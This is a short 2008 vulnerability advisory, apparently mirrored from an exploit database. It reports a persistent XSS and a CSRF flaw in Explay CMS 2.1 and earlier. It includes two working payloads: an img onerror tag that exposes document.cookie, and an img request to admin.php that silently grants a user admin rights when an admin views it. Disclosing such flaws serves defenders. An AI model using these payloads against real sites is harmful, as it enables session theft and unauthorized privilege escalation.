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Explay CMS <= 2.1 Persistent XSS and CSRF Vulnerability

🗓️ 19 Sep 2008 00:00:00Reported by hodikType 
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Explay CMS <= 2.1 Persistent XSS and CSRF Vulnerability. Bad anti-XSS filter allows persistent XSS injection, while CSRF vulnerability enables unauthorized user to gain admin rights

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Explay CMS <= 2.1 Persistent XSS and CSRF Vulnerability
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Discovered by hodik


1. Persistent XSS
This CMS has bad anti-XSS filter that cut only some basic vectors. The loginned user can inject persistent XSS by adding to article text or comment  <img src="http://google.com" onerror="alert(document.cookie)" />

2. CSRF
User can get admin rights if admin open malicious page that contain, for instance:
<img src="http://explay.localhost/admin.php?name=users&page=1&order=user_id&set_admin=2" />
or merely insert it to comment or article text.



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19 Sep 2008 00:00Current
7.1High risk
Vulners AI Score7.1
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